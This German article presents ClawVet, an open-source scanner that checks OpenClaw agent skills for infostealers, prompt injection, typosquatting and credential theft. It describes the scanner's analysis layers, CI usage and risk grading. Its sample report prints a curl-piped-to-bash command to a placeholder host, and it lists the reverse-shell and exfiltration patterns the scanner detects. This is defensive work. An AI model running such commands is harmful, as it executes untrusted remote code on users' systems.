ClawVet: Security Scanner für OpenClaw Skills – 6‑Pass‑Analyse gegen bösartige Skills

Die Sicherheit von KI-Agenten und deren Erweiterungen rückt stärker in den Fokus. Im Umfeld der als „ClawHavoc“ beschriebenen Kampagne nennt der ClawVet-Entwicklerbericht ein deutliches Risiko für Plugin-Ökosysteme: Nach Angaben des Projekts war zeitweise ein relevanter Anteil der Skills auf dem Marketplace ClawHub bösartig. Die beschriebenen Infostealer tarnten sich demnach als Produktivitäts-Tools und zielten unter anderem auf API-Keys, SSH-Credentials sowie Browser-Daten.

ClawVet setzt genau an dieser Stelle an. Das Open-Source-Tool kombiniert mehrere Prüfschichten, um Skill-Dateien und Metadaten auf Hinweise auf Prompt-Injection, Credential-Theft, Remote-Code-Execution, Typosquatting und Social Engineering zu untersuchen. Das Ergebnis ist eine einheitliche Risikobewertung, die Entwicklern und Nutzern eine schnellere Entscheidung über Installation, Review oder Blockade ermöglichen soll.

Die Analyse-Schichten im Überblick

Skill Parser

Zu Beginn extrahiert das Tool YAML-Frontmatter, Code-Blöcke, IPs und Domains aus der jeweiligen Skill-Datei. Diese Rohdaten bilden die Grundlage für weitere Analysen.

Statische Analyse

Ein Regelwerk durchsucht den Code nach bekannten Angriffsvektoren. Dazu gehören mögliche Remote-Code-Execution-Muster, etwa gepipte Curl-Befehle, sowie Hinweise auf den Abfluss von Zugangsdaten, wenn API- oder SSH-Keys an externe Endpunkte gesendet werden. Auch Reverse-Shells, DNS-Exfiltration über kodierte Subdomains, Obfuscation und versteckte Instruktionen für Prompt-Injections können in dieser Phase auffallen.

Metadata Validator

Diese Schicht prüft die Konsistenz der Metadaten. Sie kann etwa bei fehlenden Beschreibungen, undokumentierten Binaries oder Umgebungsvariablen sowie bei widersprüchlichen Versionsangaben anschlagen.

Dependency Checker

Der Fokus liegt hier auf riskanten Installationsmustern. Dazu zählen automatische Bestätigungen bei Paketinstallationen, globale npm-Installs und Hinweise auf bekannte problematische Pakete.

Typosquat Detector

Über Ähnlichkeitsvergleiche gleicht der Scanner Skill-Namen mit bekannten Paket- oder Projektnamen ab. So können Impersonation-Angriffe auffallen, bei denen Angreifer minimale Tippfehler im Namen nutzen.

Semantische Analyse

Für komplexe Fälle lässt sich nach Projektangaben eine KI-Analyse anbinden. Sie soll Instruktionen auf versteckte Funktionalitäten und Social-Engineering-Muster untersuchen. Dafür ist ein entsprechender API-Key erforderlich.

Warum ein mehrschichtiger Ansatz sinnvoll ist

Bösartige Skills können einfache Sicherheitsprüfungen durch Verschleierung umgehen. Schadcode lässt sich über mehrere Blöcke verteilen, Payloads können kodiert werden, und C2-Adressen können in unscheinbaren Metadaten stehen. Hinzu kommen eingebettete Prompt-Injections, die Agenten zu Aktionen verleiten sollen, die Nutzer nicht ausdrücklich autorisiert haben.

Da keine einzelne Analysetechnik alle diese Vektoren zuverlässig abdeckt, ist ein mehrschichtiger Ansatz plausibel. Statische Muster, Metadatenprüfung, Dependency-Analyse und semantische Checks ergänzen sich: Was eine Ebene übersieht, kann in einer anderen Analyse auffallen.

Integration in den Entwicklungsalltag

Lokales Scannen per CLI

Entwickler können verdächtige Skills direkt über das Terminal prüfen. Für automatisierte Workflows lässt sich die Ausgabe als JSON formatieren und bei kritischen Funden ein Abbruch erzwingen:

# Lokalen Skill scannen und bei hohem Risiko abbrechen
npx clawvet scan ./my-skill --format json --fail-on high

CI/CD-Pipelines

In GitHub Actions oder ähnlichen CI/CD-Umgebungen lässt sich der Scanner als Quality Gate vor einem Merge integrieren.

- name: Vet skill before merge
  run: npx clawvet scan ./my-skill --format json --fail-on high

Web-Dashboard und API

Für Team-Workflows beschreibt das Projekt eine REST-API auf Basis von Fastify sowie ein Next.js-Dashboard. Scans sollen sich damit programmatisch einreichen, auswerten und über Webhooks an Alerting-Systeme koppeln lassen.

Risikobewertung und Reporting

Ein Scan erzeugt nach Projektangaben einen Risk Score von 0 bis 100. Kritische Funde erhöhen den Wert stärker als hohe, mittlere oder niedrige Risiken; der Score wird bei 100 gedeckelt und in eine Schulnote übersetzt.

Die Einstufung reicht von A (0–10) für unauffällige Skills bis F (76–100) für Fälle, bei denen eine Blockade empfohlen wird. Dazwischen signalisieren die Stufen B bis D steigenden Prüfbedarf bis hin zum Installationsstopp.

Ein typischer Report kann die Funde zusammenfassen und eine Handlungsempfehlung ausgeben:

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ClawVet Scan Report

 Skill: productivity-boost
 Version: <VERSION>
 Risk Score: 100/100 Grade: F

 [CRITICAL] Curl piped to shell
 curl -sL https://example.invalid/setup.sh | bash

 [HIGH] Known malicious IP
 203.0.113.10

 Recommendation: BLOCK
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Technische Basis

Das Projekt ist modular in einem Monorepo organisiert. Es trennt Backend mit Scanner-Engine und REST-API vom Web-Dashboard und dem CLI-Tool. Die Erkennungs-Engine arbeitet laut Projektbeschreibung mit einem größeren Set an Bedrohungsmustern.

Auch Testfälle für fehlerhaftes YAML, Unicode-Besonderheiten und große Eingaben werden beschrieben. Angaben zu Regex-Härtung und Schutz vor problematischen Laufzeiten sollten bei produktivem Einsatz dennoch gegen den aktuellen Projektstand geprüft werden.

Was daraus folgt

Die beschriebenen Vorfälle rund um kompromittierte Marktplätze zeigen, dass Supply-Chain-Security bei KI-Agenten früh in den Workflow gehört. Einfache Prüfmechanismen greifen oft zu kurz; belastbarer sind mehrschichtige Analysen aus statischen, semantischen und Metadaten-Checks.

Durch die Integration in CI/CD-Pipelines und eine nachvollziehbare Risikobewertung kann ClawVet als Due-Diligence-Werkzeug dienen. Wer regelmäßig externe Skills in Agenten-Workflows einbindet, erhält damit eine zusätzliche Prüfschicht, bevor sensible Daten in riskante Erweiterungen geraten.